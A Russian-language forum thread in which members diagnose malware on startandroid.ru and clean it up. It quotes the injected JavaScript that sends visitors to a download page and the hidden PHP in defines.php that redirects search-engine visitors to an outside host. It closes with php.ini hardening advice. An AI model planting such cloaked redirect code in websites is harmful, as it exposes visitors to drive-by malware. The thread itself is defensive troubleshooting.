Startandroid.ru фишинговые ссылки?
Startandroid.ru фишинговые ссылки?
Если перейти по ссылке вверху или вбить в адресной строке startandroid.ru, то все норм, но если попытаться зайти из google прилетает это
Через 5 секунд мне предлагают установить
FireFox говорит это, причем видно, как идет куча переадресаций. Адрес открытой страницы может меняться.
LinuxMint 17. Сомневаюсь что дело во мне
Через 5 секунд мне предлагают установить
FireFox говорит это, причем видно, как идет куча переадресаций. Адрес открытой страницы может меняться.
LinuxMint 17. Сомневаюсь что дело во мне
Re: Startandroid.ru фишинговые ссылки?
Проблема у тебя. Потому что у меня все ОКDonart писал(а):LinuxMint 17. Сомневаюсь что дело во мне
R.id.team
Политика на форуме запрещена
Политика на форуме запрещена
- Mikhail_dev
- Сообщения: 2386
- Зарегистрирован: 09 янв 2012, 14:45
- Откуда: Самара
Re: Startandroid.ru фишинговые ссылки?
Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.
Re: Startandroid.ru фишинговые ссылки?
Да, я яндекс предупреждает, это факт. У меня был случай когда на моем сайте писалась такая дрянь. В итоге после 2-х месячного разбирательства выяснилось что проблема (вирус) был у хостера, но он в упор отказывался это признать.Donart писал(а):Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.
Личные сообщения с просьбой ответить на форуме или написать программу я просто удаляю, если я в хорошем настроении. Если в плохом добавляю автора в черный список. По любым другим вопросам feel free to write to me.
Re: Startandroid.ru фишинговые ссылки?
Хорошо бы сразу говорить о том, что это yandex.. я к примеру никогда им не пользовался, но да результат поиска:Donart писал(а):Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.
Что харрактерно yahoo и bing, тоже говорят о malware и молчит только google и к примеру avgthreatlabs.com говорит: Currently SafeУчебник по Андроид. Уроки для начинающих
startandroid.ru
О сайте. Сайт startandroid.ru посвящен обучению разработке приложений под Android. Подробнее...
Сайт может представлять угрозу
Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных. Почему?
Посмотреть сохранённую безопасную копию
Это не угрожает вашему компьютеру и данным
Всё равно перейти на эту страницу
Переход по ссылке может нанести вред вашему компьютеру или мобильному устройству
No active malware was reported recently by users anywhere on this website.... Но что интересно, лично я мало верю yandex
P.S. но yandex ПРАВ известный javascript redirect на сайте...
P.S. а я говорил, нефик joomla баловаться и нужно использовать как минимум laravel, а лучше django или rails))))
ISSUE DETECTED DEFINITION INFECTED URL
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/uroki.html ( View Payload )
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/uroki/vse-uroki-spiskom.html ( View Payload )
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/articles/listofarticles.html ( View Payload )
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mw-redirection121?v3
Location: http://alfsystem.com.my/includes/domit/1.php
но всеравно:
MalwareDomainList - domain is Clean.
Google-SafeBrowsing - domain is Clean.
MalwareDomainList - domain is Clean.
- Mikhail_dev
- Сообщения: 2386
- Зарегистрирован: 09 янв 2012, 14:45
- Откуда: Самара
Re: Startandroid.ru фишинговые ссылки?
Короче, мы жить будем или нет?
Re: Startandroid.ru фишинговые ссылки?
Вы нет. Бэндеры до вас доберутся =)Mikhail_dev писал(а):Короче, мы жить будем или нет?
R.id.team
Политика на форуме запрещена
Политика на форуме запрещена
- Mikhail_dev
- Сообщения: 2386
- Зарегистрирован: 09 янв 2012, 14:45
- Откуда: Самара
Re: Startandroid.ru фишинговые ссылки?
И до тебя значит тоже, хох.
Re: Startandroid.ru фишинговые ссылки?
Кто знает как лечить? Поубирал пока все рекламные скрипты со стартовой.
Re: Startandroid.ru фишинговые ссылки?
да все ок, мне пришлось оперу качать, чтобы проверить.. не пашет в моих браузерах оно ) там из css грузится всякая фигняMikhail_dev писал(а):Короче, мы жить будем или нет?
в ней js который и редиректит, просто удалить хлам и все. В детали я не вдавался. Я так понял пришло оно отсюда - http://zopla.net/l/JjVWLGqfTfuLId68I3AMBnosz3 и скорее всего из какой -то рекламы. Либо же фиг его знает, нужно профайлер запускать. В общем суть в том, что идет редирект на http://alfsystem.com.my/includes/domit/1.php при условии что это переход по ссылке т.е. есть parent окно. И это проблема либо хостера либо шаблона ja_purity_ii
Re: Startandroid.ru фишинговые ссылки?
Можно попробывать поискать в js часть кода устанавливаюущую window.googleJavaScriptRedirect=1, вроде как 0 должно быть, но проще использовать сервисы вроде - http://sitecheck.sucuri.net/results/startandroid.rudamager82 писал(а):Кто знает как лечить? Поубирал пока все рекламные скрипты со стартовой.
Там можно и просканировать и почистить
Re: Startandroid.ru фишинговые ссылки?
прикол весь в том, что этот адрес приходит в ответ от сервера при условии указания Referer:
GET http://startandroid.ru/
302 Found
Request
GET / HTTP/1.1
User-Agent: Opera/9.80 (X11; Linux x86_64) Presto/2.12.388 Version/12.16
Host: startandroid.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://www.google.com.ua/url?sa=t&rct=j ... 0JUTkkqQIQ
Cookie: ja_purity_ii_tpl=ja_purity_ii; 56a2310a275ea871d4a200f1af00b766=ab020b75f845e2a4a582a9e3523fb103; _ga=GA1.2.1192279240.1403264439; e21b278b1e246d6eaee3ccf5b602f8cb=ru-RU
Connection: Keep-Alive
Response
HTTP/1.1 302 Found
Server: nginx/1.4.4
Date: Fri, 20 Jun 2014 12:24:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Location: http://alfsystem.com.my/includes/domit/1.php
Re: Startandroid.ru фишинговые ссылки?
Как варриант... судя по этому
[syntax=javascript]var meta_refresh = document.getElementById('meta_refresh');
meta_refresh.content = '';
meta_refresh.parentNode.removeChild(meta_refresh);
(function() {
if (top.frames.length != 0) {
top.location = self.document.location;
}
var DOMReady = function(a, b, c) {
b = document, c = 'addEventListener';
b[c] ? b[c]('DOMContentLoaded', a) : window.attachEvent('onload', a)
}
DOMReady(function() {
var interval;
interval = setInterval(function() {
clearInterval(interval);
location.href = "http://zopla.net/download?midlet_id=21& ... ent&auto=1";
}, parseInt(5) * 1000);
var cancelInterval = function() {
clearInterval(interval);
};
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
if (links.addEventListener) {
links.addEventListener('click', cancelInterval, false);
}
else if (links.attachEvent) {
links.attachEvent('onclick', cancelInterval);
}
}
});
})()/*-->*/[/syntax]
для редиректа используется <meta> тег, на сколько я помну Location из php имеет больший приоритет, что если просто установить редирект на стартовую страницу из нее же отсекая referer -a, ну или же просто в качестве стартовой установить страницу index.php из которой просто руками послать заголовки без реферера.. пусть эта вирусня живет себе, всеравно ничего сделать не сможет ))
P.S. кстати если это не реклама - вполне может быть виджет Vk принес каку.
[syntax=javascript]var meta_refresh = document.getElementById('meta_refresh');
meta_refresh.content = '';
meta_refresh.parentNode.removeChild(meta_refresh);
(function() {
if (top.frames.length != 0) {
top.location = self.document.location;
}
var DOMReady = function(a, b, c) {
b = document, c = 'addEventListener';
b[c] ? b[c]('DOMContentLoaded', a) : window.attachEvent('onload', a)
}
DOMReady(function() {
var interval;
interval = setInterval(function() {
clearInterval(interval);
location.href = "http://zopla.net/download?midlet_id=21& ... ent&auto=1";
}, parseInt(5) * 1000);
var cancelInterval = function() {
clearInterval(interval);
};
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
if (links.addEventListener) {
links.addEventListener('click', cancelInterval, false);
}
else if (links.attachEvent) {
links.attachEvent('onclick', cancelInterval);
}
}
});
})()/*-->*/[/syntax]
для редиректа используется <meta> тег, на сколько я помну Location из php имеет больший приоритет, что если просто установить редирект на стартовую страницу из нее же отсекая referer -a, ну или же просто в качестве стартовой установить страницу index.php из которой просто руками послать заголовки без реферера.. пусть эта вирусня живет себе, всеравно ничего сделать не сможет ))
P.S. кстати если это не реклама - вполне может быть виджет Vk принес каку.
Re: Startandroid.ru фишинговые ссылки?
Какой ужас. Я теперь не с одного браузера не могу войти. Даже с гугля. Приходиться заходить с телефона!
R.id.team
Политика на форуме запрещена
Политика на форуме запрещена
Re: Startandroid.ru фишинговые ссылки?
Нашел вот такую хрень. Была закодирована в файле
public_html\includes\defines.php
И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"
public_html\includes\defines.php
Я так понимаю - это основной источник проблем?error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alfsystem.com.my/includes/domit/1.php");
exit();
}
}
}
И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"
Re: Startandroid.ru фишинговые ссылки?
У меня хром открывает, если нажать Дополнительно и На свой страх и рискrezak90 писал(а):Какой ужас. Я теперь не с одного браузера не могу войти. Даже с гугля. Приходиться заходить с телефона!
Re: Startandroid.ru фишинговые ссылки?
Да я так само уже открываю)) но все же каждый раз не очень удобно.
P.S. наш сайт тоже ломанули
P.S. наш сайт тоже ломанули
R.id.team
Политика на форуме запрещена
Политика на форуме запрещена
Re: Startandroid.ru фишинговые ссылки?
да очень похоже, условия совпадают, учитывает реферера и редирект именно на тот сайт, поздравляюdamager82 писал(а):Нашел вот такую хрень. Была закодирована в файле
public_html\includes\defines.php
Я так понимаю - это основной источник проблем?error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alfsystem.com.my/includes/domit/1.php");
exit();
}
}
}
И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"
вывод установить в php.ini
сменить права доступа на папки и ограничить доступ к ftp по IP, лучше вообще закрыть и пользоваться ssh. Да и вообще нужно полностью на https переходить.register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории